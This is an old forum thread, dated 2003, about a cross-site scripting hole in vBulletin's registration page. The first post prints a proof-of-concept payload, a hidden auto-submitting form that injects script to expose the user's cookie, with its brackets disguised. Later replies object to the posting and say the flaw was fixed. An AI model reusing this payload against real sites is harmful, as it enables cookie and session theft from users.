Jusunlee.com Forums - Vbulletin Exploit

Show all 5 posts from this thread on one page

Jusunlee.com Forums (https://www.jusunlee.com/forums/index.php)
- Technology (https://www.jusunlee.com/forums/forumdisplay.php?forumid=28)
-- Vbulletin Exploit (https://www.jusunlee.com/forums/showthread.php?threadid=14729)

Posted by 700B501337 on 12-08-2003 09:17 PM:

Vbulletin Exploit

an attacket can inject html with this:

[form action="http://[victim]/register.php?do=register" method="post"
style="display:none"]
[input type="hidden" name="s" value="" /]
[input type="hidden" name="regtype" value="1" /]
[input type="text" class="bginput" name="field1" value="" size="25"
maxlength="250" /]
[input type="hidden" name="url" value="index.php" /]
[input type="hidden" name="do" value="addmember" /]
[/form]
[script]
//Code that will be executed
var xss = "\"][script]alert(document"+".cookie)[\/script]";
document.forms[0].field1.value=xss;
document.forms[0].submit();
[/script]

*Replace ([],<> )

be careful

__________________

Posted by kryogenix on 12-08-2003 09:34 PM:

remove this please before people get ideas

Posted by 700B501337 on 12-08-2003 09:37 PM:

quote:
Originally posted by kryogenix
remove this please before people get ideas

no, i don't mean it that way, i'm just saying, it's possible so watch out, people can steal your password like that romeo guy in random thoughts

__________________

Posted by kiggaplease on 12-08-2003 10:20 PM:

this is for vB 3.0 beta, anyway

Posted by micron on 12-10-2003 02:31 AM:

xss injection vulnerabilities has been addressed since vb2.2.9..

All times are GMT. The time now is 09:19 AM.

Show all 5 posts from this thread on one page